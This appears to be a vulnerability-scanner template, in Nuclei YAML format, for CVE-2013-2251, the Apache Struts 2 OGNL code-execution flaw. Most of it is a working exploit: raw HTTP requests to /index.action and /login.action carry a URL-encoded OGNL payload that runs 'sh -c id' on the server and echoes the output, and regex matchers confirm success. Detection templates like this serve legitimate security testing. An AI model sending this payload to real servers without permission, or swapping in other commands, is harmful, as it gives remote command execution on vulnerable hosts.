id: cve-2013-2251 info: name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution author: exploitation & @dwisiswant0 severity: critical description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. requests: - payloads: params: - "redirect" - "action" - "redirectAction" raw: - | GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} Connection: close Accept: */* Accept-Language: en - | GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} Connection: close Accept: */* Accept-Language: en matchers-condition: and matchers: - type: status status: - 200 - 400 condition: or - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - type: word words: - "There is no Action mapped for namespace" - "The origin server did not find a current representation for the target resource" - "Apache Tomcat" condition: or part: body